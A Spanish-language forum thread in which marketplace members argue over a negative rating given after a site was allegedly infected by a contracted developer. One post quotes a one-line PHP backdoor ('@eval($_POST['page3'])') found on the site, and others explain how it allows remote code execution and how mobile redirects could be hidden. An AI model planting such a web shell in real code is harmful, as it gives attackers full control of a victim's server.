Calificación negativa de tnc05

• Autor Autor kanikase
  • Fecha de inicio Fecha de inicio
Estado

🔒 Este tema está cerrado para nuevas respuestas.

⏰ Solo el creador del tema puede solicitar la reapertura de sus propios temas, pero únicamente dentro de los 60 días previos a la última actualización.

Los he visto a los dos usuarios son serios indiscutiblemente y lindos :3

En fin, acá el tema no es el trabajo final, de eso no se puede hablar ya que llegaron a un acuerdo, así que la calificación va por la infección del sitio. Ahora bien, entiendo perfectamente el punto de tnc05 si le das acceso a una persona y el sitio presenta problemas evidentemente le culpare de ese problema, pero, existe alguna prueba irrefutable de que Kanikase infecto el sitio?
Yo busco llegar al fin de esto y no se crucifique a una persona por algo que quizás no cometió o quizás lo hizo, y ese es el punto que no se sabe a seguridad.

No se si me entienden

Es su palabra contra la mía, nadie sabe lo que pasó (ni yo ni él).
exacto pero hay un afectado economicamente y no fusite tú. Si eres el responsable de entregar un mal trabajo y retrasarte. Por tanto a ti no te interesa porque no pierdes nada, mas que claro un -1 en tu "reputacion" aunque ya quedó claro como "trabajas".

exacto pero hay un afectado economicamente y no fusite tú. Si eres el responsable de entregar un mal trabajo y retrasarte. Por tanto a ti no te interesa porque no pierdes nada, mas que claro un -1 en tu "reputacion" aunque ya quedó claro como "trabajas".

Creo que sin pruebas no pueden hacer nada.

Tengan o no la razón.

No defiendo por conocerlo, te reitero solo participo activaamente porque soy actor de este drama. Tampoco has brindado una sola prueba de no haberlo hecho. Sin embargo el usuario tuvo su web infectada durante 5 dias y el ultimo en ingresar fuiste tú. Acaso vas a poner en duda la palabra de todo el mundo?

Eso no puedes afirmarlo, nadie sabe si ntc05 le dio acceso a alguien mas, lo que si sabemos es que el estaba desesperado por solucionar el problema y si busco mas ayuda, no sabemos si fuiste la primer opción.

Yo sigo sin ver pruebas, solo sospechas, insisto en eso.

Ademas como bien insisten, debe haber algún registro de redireccionamiento de las visitas perdidas, solo muestran un bajón de visitas que se pueden deber a diversos factores, una de ellas las caidas de sitios, analytics aunque halla visitas no las registra si el sitio esta offline.

Ademas de nuevo insisto en que ntc05, acepto el trabajo tal cual quedo (sin importar que lo considerara un mal trabajo), eliminando posibilidad de negativa justificada, acepto también los tiempos bajo la misma razón.

[MENTION=29029]SoLuIts[/MENTION] Imagina que yo no se nada sobre programación, ¿me podrías explicar en que beneficiaria ese código al que infecta el sitio?

Antes que nada estamos en una aclaración y esta permitido cualquier comentario de los usuarios pero amigos / familiares siempre protegeran a alguien que conocen que un desconocido ... evitemos eso y dejemos que otros comenten.

Bueno antes que nada [MENTION=29029]SoLuIts[/MENTION]
para los que no lo sepan dicho codigo permite hacerse con el control de todo un sitio.
codigo:
Insertar CODE, HTML o PHP:
<?php @eval($_POST['page3']);?>

Si te refieres al codigo eval que esta citado en codigo pues estas equivocado no veo nada malo ahi.... asi que voy por la otra opcion:
$_POST['page3'] recibe esa opcion si se envia un form con la id 'page3' lo cual dudo que ese era el problema ....
porque razón habría una "redireccion" con un $_POST['page3'] si nisiquiera esta dando click a algun boton del form? o lo esta dando ???...

El codigo que mostraste en un txt no veo nada relacionado a esto. ( virus o similar no veo nada )

Yo no conosco al Sr. [MENTION=81006]kanikase[/MENTION] asi que no me consideres aliado ni tampoco enemigo pero yo doy mi opinion y aqui hay algo sumamente extraño.
Que algun programador aparte de mi se percate de esto por favor y me diga que estoy incorrecto.

[MENTION=28762]tnc05[/MENTION] tu no puedes dar una acusasion a alguien asi por asi, primero se habla y de buenas maneras , que me venga un usuario y me diga " malgoraste mi sitio, colaborame o te coloco negativa " ??? como que no va pero bueno ... lo acusaste solo porque el entro ese dia a la modificacion/creacion/remplazo/etc del script por FTP , si crees que el fue el culpable minimo dale mas informacion y detalles no diciendo te colocare negativa.

Tal ves te artaste que el usuario te haga dar vueltas en el asunto y es normal pero eso seria otra acusacion , no estamos por eso aqui.

El usuario que te arreglo tu sitio que es [MENTION=29029]SoLuIts[/MENTION] me puedes pasar el codigo eval completo por favor? porque ese $_POST['page3'] supongo que tu lo pusiste o modificaste porque no hay nada malo ahi, quisiera saber el codigo completo , haber si [MENTION=81006]kanikase[/MENTION] acepta dar ese codigo en publico o parte de ella de la cual "encripto" y si no lo encripto mucho mejor.

Asi veremos de quien fue la culpa , el verdadero culpable y quien miente o no.

- - - Actualizado - - -

[MENTION=29029]SoLuIts[/MENTION] Imagina que yo no se nada sobre programación, ¿me podrías explicar en que beneficiaria ese código al que infecta el sitio?

si no pone codigo completo no se sabria, ese eval de ahi no infecta ni se apodera de nada si no esta el codigo completo , alguien que muestre el codigo completo del eval sea codificado o no ? .
Que pruebas hay del virus?

Última edición:
Mi comentario no aportará demasiado pero quiero decir primero que realicé negocios con ambos usuarios y la experiencia fue agradable. Segundo que llama poderosamente la atención que exista un inconveniente entre usuarios de alto itrader, por lo general la falta de profesionalismo se dá en usuarios nuevos que no tienen mucha experiencia en el foro y sobre como utilizar las calificaciones.

Con respecto al problema en cuestión primero creo que la calificación negativa está mal colocada, al menos sin dar una explicación concreta en el momento de porque la web resulto infectada y en que se basa el usuario para llegar a esa conclusión. Luego habría que comprobar si el usuario kanikase realmente infecto la web (algo muy complicado de comprobar) pero me imagino que si solo redirigía el tráfico de escritorio y si la web estaba montada en wordpress habría utilizado la función is_mobile y un meta refresh, siendo de este modo la url hacia donde se redirige el tráfico debería estar en algún lado y de esta manera se podría llegar al responsable del acto. De comprobarse que kanikase fue el responsable, obviamente le cabe la calificación negativa.

Ojalá ambas partes muestren más pruebas!

Deberian solo dar pruebas de los archivos y que los programadores expliquen o vean si estaba infectado o no, ya que un redireccionamiento se puede hacer de algunas maneras sin necesidad de tener virus. Y que las personas que conozcan o no den pruebas. Mientras exista dinero por medio ni familia ni amigos deben meterse.

El eval ejecuta codigo PHP en el servidor.. por lo que puedo hacer lo que guste con el servidor... editar lo que sea y redireccionar a otro lado...
sin-t-tulo-4fa7d24.png

(Cambie $_POST por $_GET)

Ese codigo no se sabe si ya estaba en el sitio y dio la casualidad de que lo ejecutaron para estas fechas... o ya tenian acceso al sitio desde antes

La calificacion es por infectar el sitio, eso no es valido, la calificación es por el negocio el cual fue terminado (a medias o no, ambos quedaron de acuerdo)...Si luego le infectaron el sitio, se tiene que colocar pruebas suficientes las cuales muestren que kanikase edito el archivo ese colocando el eval de php, ya que podria haber estado infectado hace mucho y sin saberlo... Con cualquier escaner de vulnerabilidades (acunetix, etc) se podria descubrir ese bug y acceder (llegado el caso de que ya existiera en la web)...

[MENTION=28762]tnc05[/MENTION] tienes que colocar las pruebas de que [MENTION=81006]kanikase[/MENTION] te "infecto el sitio" y sea cual sea el caso, la negativa no va... por el negocio las dos partes quedaron de acuerdo como terminada (sea inconcluso o no)...

PD: Si voy a modificar un sitio web para hackearlo o lo que sea, no coloco un eval a simple vista de cualquiera... y menos sin al menos codificar ni nada... :fatigue:

Última edición:
Bueno, pruebas él no puede dar, porque no infecté su web, así que es imposible que dé pruebas, y si las llega a dar pues me quedo con la negativa.

Lo más que se puede hacer es, que él diga cuál era el dominio al que redireccionaba, y hacerle whois y tal vez de ahí sacar algo de información.

He leído todo y por ahora estoy a favor de tnc05.
Kanikase lo único que ha dicho es cosas como ¿puedes comprobar que fui yo? apoyas a tnc05 porque lo conoces, ¿porque comentas mas que el afectado?
Eso es falta de seriedad a mi criterio, y es que por lógica uno culpa al primero que ve, o sea kanikase fue el que entro a la web.
Y también leyendo ambos usuarios argumentan que ganan bastante dinero, así que ninguno de los dos podría ganar algo con esto, por parte de kanikase tal vez saldría más beneficiado por que ganaría dinero con la redirección, y ¿el otro usuario que ganaría? ¿solo fastidiar al otro? así yo lo veo.
Ahora la solución que creo seria lo ideal para que ambos usuarios salgan bien de alguna forma es que kanikase le reembolse a tnc05 y el retire la negativa.
Y quedaría el caso sin resolver, quien pudo infectar la web porque aun faltan pruebas que seria difícil de encontrar.
Saludos

He leído todo y por ahora estoy a favor de tnc05.
Kanikase lo único que ha dicho es cosas como ¿puedes comprobar que fui yo? apoyas a tnc05 porque lo conoces, ¿porque comentas mas que el afectado?
Eso es falta de seriedad a mi criterio, y es que por lógica uno culpa al primero que ve, o sea kanikase fue el que entro a la web.
Y también leyendo ambos usuarios argumentan que ganan bastante dinero, así que ninguno de los dos podría ganar algo con esto, por parte de kanikase tal vez saldría más beneficiado por que ganaría dinero con la redirección, y ¿el otro usuario que ganaría? ¿solo fastidiar al otro? así yo lo veo.
Ahora la solución que creo seria lo ideal para que ambos usuarios salgan bien de alguna forma es que kanikase le reembolse a tnc05 y el retire la negativa.
Y quedaría el caso sin resolver, quien pudo infectar la web porque aun faltan pruebas que seria difícil de encontrar.
Saludos

Es que, digo eso porque en realidad no hice eso, por eso, como dije atrás, cuando él dé una prueba contundente de que fui yo, me quedo con la negativa.

cual era el dominio a que redirecciona??

Es lo que [MENTION=28762]tnc05[/MENTION] y [MENTION=29029]SoLuIts[/MENTION] no quieren decir...

Mientras no pongan pruebas concretas y el sitio web al que supuestamente redireccionaba el tráfico, entonces no hay más que opinar...

Foronovela innecesaria. Independientemente si el codigo está malo o no. El usuario kanikase incumple con los tiempos estipulados. :star2:

Perdon que me meta.

pero creo que la calificacion es incorrecta, por una simple y sencilla razon... el negocio era -si no estoy equivocado- trabajar en un bot... el tema de la infeccion de una web... no necesariamente viene de un FTP hay millon maneras de ser infectados, y desafortunadamente no hay manera de comprobar que el "desarrollador" es el responsable...

ahora que honestamente las excusas que el "desarrollador" dio por el retraso YO NO ME LAS CREERIA.

sin embargo creo que la calificación es incorrecta el usuario QUIZAS debio calificar negativo por no cumplir con lo ofrecido MAS NO POR UNA INFECCIÓN DE VIRUS...

quizas no les caiga bien la opinión pero es lo que yo creo

La negativa no va como ya dijo el moderador ambas partes quedaron de acuerdo en que el trabajo quedara asi! Respecto a la infeccion me lei todo esperando pruebas y la url de la redireccion y despues de 7 paginas sigo sin ver la prueba! :neglected: :neglected:

Totalmente a favor de que se retire la negativa de [MENTION=81006]kanikase[/MENTION] me ah echo varios trabajos y nunca un solo problema! Algo aca es raro y veo que solo lo acusan y acusan sin prueba alguna :encouragement: Saludos! 😉

Foronovela innecesaria. Independientemente si el codigo está malo o no. El usuario kanikase incumple con los tiempos estipulados. :star2:

Puedes leer todo por favor y luego opinar.

- - - Actualizado - - -

Perdon que me meta.

pero creo que la calificacion es incorrecta, por una simple y sencilla razon... el negocio era -si no estoy equivocado- trabajar en un bot... el tema de la infeccion de una web... no necesariamente viene de un FTP hay millon maneras de ser infectados, y desafortunadamente no hay manera de comprobar que el "desarrollador" es el responsable...

ahora que honestamente las excusas que el "desarrollador" dio por el retraso YO NO ME LAS CREERIA.

sin embargo creo que la calificación es incorrecta el usuario QUIZAS debio calificar negativo por no cumplir con lo ofrecido MAS NO POR UNA INFECCIÓN DE VIRUS...

quizas no les caiga bien la opinión pero es lo que yo creo

Pues sí, es lócigo y entiendo que nadie crea lo que dije, las "excusas", pero realmente pasó todo lo que le escribí, y como dije en un comentario anterior PUEDO dar pruebas de todo eso si las piden, aunque no es necesario porque el tiempo de entrega o el trabajo final, no es el motivo de la calificación.

Pero el otro lo aceptó el mismo lo dijo jaja

Enviado desde mi SGH-M919 mediante Tapatalk

Estado

🔒 Este tema está cerrado para nuevas respuestas.

⏰ Solo el creador del tema puede solicitar la reapertura de sus propios temas, pero únicamente dentro de los 60 días previos a la última actualización.

Atrás